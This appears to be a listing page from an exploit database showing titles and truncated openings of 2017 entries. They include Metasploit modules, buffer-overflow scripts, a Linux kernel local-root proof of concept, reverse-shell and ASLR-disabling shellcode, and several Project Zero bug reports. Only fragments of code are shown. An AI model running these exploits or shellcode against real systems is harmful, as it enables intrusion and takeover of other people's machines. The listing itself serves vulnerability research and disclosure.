Adobe Flash - AVC Deblocking Out-of-Bounds Read

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1171 The attached swf triggers an out-of-bounds read in AVC deblocking. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42017.zip...

Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution

!/usr/bin/python3 Oracle PeopleSoft SYSTEM RCE https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce cf 2017-05-17 import requests import urllib.parse import re import string import random import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning...

Adobe Flash - Out-of-Bounds Read in Getting TextField Width

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1211 The attached swf causes an out-of-bounds read in getting the width of a TextField. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42019.zip...

Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107 Windows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP Platform: Windows 10 10586/14393 not tested 8.1 Update 2 Class: Elevation of Privilege Summary: When accessing an OOP COM object using IRemUnknown2 the local...

Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1145 We have observed on Windows 7 32-bit that for unclear reasons, the kernel-mode structure containing the default DACL of system processes' tokens lsass.exe, services.exe, ... has 8 uninitialized bytes at the end, as the size ...

Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1127 We have identified two related bugs in Windows kernel code responsible for implementing the bind socket function, specifically in the afd!AfdBind and tcpip!TcpBindEndpoint routines. They both can lead to reading beyond the...

Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Quest Privilege Manager pmmasterd Buffer Overflow', 'Description' = %q This modules exploits a buffer overflow in the Quest Privilege Manager, a...

Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1161 We have discovered that the handler of the nt!NtTraceControl system call specifically the EtwpSetProviderTraitsUm functionality, opcode 0x1E discloses portions of uninitialized pool memory to user-mode clients on Windows 10...

LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow (SEH)

!/usr/bin/python print "LabF nfsAxe 3.7 FTP Client Buffer Overflow SEH" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Tested on Windows Vista x86 import socket import sys badchars \x00\x10\x0a buf = "" buf +=...

Mailcow 0.14 - Cross-Site Request Forgery

Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MAILCOW-v0.14-CSRF-PASSWORD-RESET-ADD-ADMIN.txt + ISR: ApparitionSec Vendor: ============= mailcow.email mailcow.github.io Product: =========== The integrated mailcow UI...

Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1182 We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 other platforms untested indirectly through the win32k!NtUserCreateWindowEx system call...

Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)

!/usr/bin/python Exploit Title : Larson VizEx Reader 9.7.5 - Local Buffer Overflow SEH Date : 14/05/2017 Exploit Author : Muhann4d CVE : CVE-2017-8927 Vendor Homepage : http://www.cgmlarson.com/ Software Link : http://download.freedownloadmanager.org/Windows-PC/Larson-VizEx-Reader/FREE-9.7.5.html...

PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload

Exploit Title: PlaySMS 1.4 Code Execution using $filename and Unrestricted File Upload in sendfromfile.php Date: 14-05-2017 Software Link: https://playsms.org/download/ Version: 1.4 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website: http://touhidshaikh.com/...

Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)

!/usr/bin/python Exploit Title : Halliburton LogView Pro 10.0.1 - Local Buffer Overflow SEH Date : 2017-05-14 Exploit Author : Muhann4d CVE : CVE-2017-8926 Vendor Homepage : http://www.halliburton.com Software Link :...

Dive Assistant Template Builder 8.0 - XML External Entity Injection

Exploit Title: Dive Assistant - Template Builder XXE Injection + Date: 12-05-2017 + Exploit Author: Trent Gordon + Vendor Homepage: http://www.blackwave.com/ + Software Link: http://www.diveassistant.com/Products/DiveAssistantDesktop/index.aspx + Version: 8.0 + Tested on: Windows 7 SP1, Windows...

OpenVPN 2.4.0 - Denial of Service

!/usr/bin/env python3 ''' $ ./dosserver.py & $ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf ... Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from AFINET192.168.149.1:64249, sid=9a6c48a6 1467f5e1 Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at...

Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule ' Microsoft IIS WebDav ScStoragePathFromUrl Overflow', 'Description' = %q Buffer overflow in the ScStoragePathFromUrl function in the WebDAV servic...

Vanilla Forums < 2.3 - Remote Code Execution

!/bin/bash / / / / / / / / / / / / / / / / / / // / / / /// / / / / // / // / // / / / / // / // , / / / ///, /,// // //,///||// // // Vanilla Forums = 2.3 Remote Code Execution RCE PoC Exploit 0day Core version no plugins, default config. CVE-2016-10033 RCE CVE-2016-10073 Header Injection...

Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation

// A proof-of-concept local root exploit for CVE-2017-7308. // Includes a SMEP & SMAP bypass. // Tested on 4.8.0-41-generic Ubuntu kernel. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308 // // Usage: // user@ubuntu:$ uname -a // Linux ubuntu 4.8.0-41-generic 4416.04.1-Ubuntu...

MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service

VuNote ====== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-8798 Version: 0.6 Date: May 1st, 2017 Tag: miniupnpc getHTTPResponse chunked encoding integer signedness error Overview -------- Name: miniupnpc Vendor: Thomas Bernard References: http://miniupnp.free.fr/ 1...

Cisco DPC3928 Router - Arbitrary File Disclosure

Vulnerability Summary The following advisory describes an arbitrary file disclosure vulnerability found in Cisco DPC3928AD DOCSIS 3.0 2-PORT Voice Gateway. The Cisco DPC3928AD DOCSIS is a home wireless router that is currently "Out of support" but is provided by ISPs world wide. Credit An...

CMS Made Simple 2.1.6 - Multiple Vulnerabilities

Title: CMSMS 2.1.6 Multiple Vulnerabilities Date: 10-05-2017 Tested on: Windows 8 64-bit Exploit Author: Osanda Malith Jayathissa @OsandaMalith Original write-up: https://osandamalith.com/2017/05/11/cmsms-2-1-6-multiple-vulnerabilities/ CVE: CVE-2017-8912 Remote Code Execution...

QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass

Exploit QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass Date: 10.05.2017 Software Link: https://www.qnap.com Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: web 1. Description $COOKIESTATIONSID is not...

Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)

Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com Date and time of release: May, 9 2017 - 13:00PM Found this and more exploits on my open source security project: http://www.exploitpack.com MS17-010 - https://technet.microsoft.com/en-us/library/security/ms17-010.aspx Tested on:...

Gongwalker API Manager 1.1 - Cross-Site Request Forgery

Exploit Title: gongwalker API Manager v1.1 - CSRFAdd/Delete/Edit API Date: 2017-05-10 Exploit Author: HaHwul Exploit Author Blog: www.hahwul.com Vendor Homepage: https://github.com/gongwalker/ApiManager Software Link: https://github.com/gongwalker/ApiManager.git Version: v1.1 Tested on: Debian...

SAP SAPCAR 721.510 - Heap Buffer Overflow

''' Source: https://www.coresecurity.com/advisories/sap-sapcar-heap-based-buffer-overflow-vulnerability 1. Advisory Information Title: SAP SAPCAR Heap Based Buffer Overflow Vulnerability Advisory ID: CORE-2017-0001 Advisory URL:...

BanManager WebUI 1.5.8 - PHP Code Injection

BanManager WebUI 1.5.8 - PHP Code Injection & Stored XSS Exploit Title: BanManager WebUI - PHP Code Injection & Stored XSS Date: 2017-05-10 Exploit Author: HaHwul Exploit Author Blog: www.hahwul.com Vendor Homepage: https://github.com/BanManagement/BanManager-WebUI Software Link:...

Intel Active Management Technology - System Privileges

!/usr/bin/python -- coding: utf-8 -- Author: Nixawk CVE-2017-5689 = dork="Server: IntelR Active Management Technology" port:"16992", ports= 623, 664, 16992, 16993, 16994, 16995 products= Active Management Technology AMT, Intel Standard Manageability ISM, Intel Small Business Technology SBT versio...

Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions

Exploit Title: Discover all tables and columns in database when creating new customer role Date: 3/29/2017 Exploit Author: Pesach Zirkind Vendor Homepage: https://personifycorp.com/ Version: 7.5.2 - 7.6.1 Tested on: Windows all versions CVE : CVE-2017-7314 Category: webapps 1. Description Any...

wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One

TALOS-2017-0293 WOLFSSL LIBRARY X509 CERTIFICATE TEXT PARSING CODE EXECUTION VULNERABILITY MAY 8, 2017 CVE-2017-2800 SUMMARY An exploitable off-by-one write vulnerability exists in the x509 certificate parsing functionality of wolfSSL library versions up to 3.10.2. A specially crafted x509...

LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflow

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1124 There are multiple paths in mkvparser::Block::Block... that result in heap buffer overflows. See attached for sample files that trigger the overflow conditions - these will not reliably crash the process, since the overflows a...

I, Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple vulnerabilities product: I, Librarian PDF manager vulnerable version: =4.6 & 4.7 fixed version: 4.8 CVE number: - impact: Critical homepage:...

Personify360 7.5.2/7.6.1 - Improper Access Restrictions

Exploit Title: Access and read and create vendor / API credentials in plaintext Date: 3/29/2017 Exploit Author: Pesach Zirkind Vendor Homepage: https://personifycorp.com/ Version: 7.5.2 - 7.6.1 Tested on: Windows all versions CVE : CVE-2017-7312 Category: webapps 1. Description Any website visito...

Crypttech CryptoLog - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Crypttech CryptoLog Remote Code Execution", 'Description' = %q This module exploits the sql injection and command injection vulnerability of...

Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remote Type Confusion

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5 MsMpEng is the Malware Protection service that is enabled by default on Windows 8, 8.1, 10, Windows Server 2012, and so on. Additionally, Microsoft Security Essentials, System Centre Endpoint Protection and various othe...

LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1117 Failure to initialise pointers in mkvparser::Tracks constructor The constructor mkvparser::Tracks::Tracks doesn't handle parsing failures correctly. If we look at the function, it makes allocations in two places; the first whe...

LG G4 MRA58K - 'liblg_parser_mkv.so' Bad Allocation Calls

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1102 In both of the following functions mkvparser::AudioTrack::AudioTrackmkvparser::Segment, mkvparser::Track::Info const&, long long, long long mkvparser::VideoTrack::VideoTrackmkvparser::Segment, mkvparser::Track::Info const&, lo...

Oracle GoldenGate 12.1.2.0.0 - Remote Code Execution

!/usr/bin/env python Sources: https://silentsignal.hu/docs/S2OracleGoldenGateGOLDENSHOWER.py https://blog.silentsignal.eu/2017/05/08/fools-of-golden-gate/ GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal Tested with: Version 12.1.2.0.0 17185003...

Linux/x86 - Disable ASLR Shellcode (80 bytes)

Linux/x86 - Disable ASLR Shellcode 80 bytes. Shellcode exploit for Linx86 platform / Linux/x86 setuid-disable-aslr.c by @abatchy17 - abatchy.com Shellcode size: 80 bytes SLAE-885 section .text global start start: ; ; setruid0,0 ; xor ecx,ecx mov ebx,ecx push 0x46 pop eax int 0x80 ; ;...

Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)

Exploit Title: Gemalto SmartDiag Diagnosis Tool = v2.5 - Buffer Overflow - SEH Overwrite Date: 16-03-2017 Software Link: http://support.gemalto.com/index.php?id=downloadtools Exploit Author: Majid Alqabandi Contact: https://www.linkedin.com/in/majidalqabandi/ CVE: CVE-2017-6953 Category: Local -...

RPCBind / libtirpc - Denial of Service

!/usr/bin/ruby Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb By Guido Vranken https://guidovranken.wordpress.com/ Thanks to Sean Verity for writing an exploit in Ruby for an earlier vulnerability:...

Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)

Linux/x86-64 - Reverse Shell Shellcode IPv6 113 bytes. Shellcode exploit for Linx86-64 platform BITS 64 ; reverse ip6 tcp shell ; size = 113 bytes depends of ip addr, default is ::1 ; nullbytes free depends only on ip addr, ; you could always and the ip add to remove ; the nulls like i did with t...

MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)

!/usr/bin/python Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow SEH CVE : CVE-2017-8869 Exploit Author : Muhann4d @0xSecured Vendor Homepage : http://www.mediacoderhq.com Vulnerable Software: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe Vulnerable Version...

Xen 64bit PV Guest - pagetable use-after-type-change Breakout

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1231 This is a bug in Xen that permits an attacker with control over the kernel of a 64bit X86 PV guest to write arbitrary entries into a live top-level pagetable. To prevent PV guests from doing things like mapping live pagetables...

Technicolor DPC3928SL - SNMP Authentication Bypass

!/usr/bin/python -- coding: utf-8 -- StringBleed - CVE-2017-5135 author = "Nixawk" funcs = 'generatesnmpcommunitystr', 'generatesnmpprotopayload', 'sendsnmprequest', 'readsnmpcommunitystr', 'readsnmpvarbindstr', 'snmplogin', 'snmpstringbleed' import struct import uuid import socket import time...

ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities

CVE-2017-6086 Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15 Product Description ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL licen...

WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection

Source: http://www.defensecode.com/advisories/DC-2017-02-011WordPressWebDoradoGalleryPluginAdvisory.pdf DefenseCode ThunderScan SAST Advisory WordPress WebDorado Gallery Plugin - SQL Injection Vulnerability Advisory ID: DC-2017-02-011 Software: WordPress WebDorado Gallery Plugin Software Language...

Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure

Exploit title: Sitecore CMS v8.2 multiple vulnerabilities Product: Sitecore Version: 8.2, Rev: 161221, Date: 21st December, 2016 Date: 05-05-2017 Author: Usman Saeed Email: [email protected] Vendor Homepage: http://www.sitecore.net/ Disclaimer: Everything mentioned below is for educational puposes...

CloudBees Jenkins 2.32.1 - Java Deserialization

Source: https://blogs.securiteam.com/index.php/archives/3171 Vulnerability Details Jenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent. The vulnerability can be found in the implementation of a bidirectional communicati...

Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free

function makecompiledfunction function targetx return x5 + x - xx; // Call only once so that function gets compiled with low level interpreter // but none of the optimizing JITs target0; return target; function pwn var haxs = new Array0x100; for var i = 0; i 0x100; ++i haxsi = new Uint8Array0x100...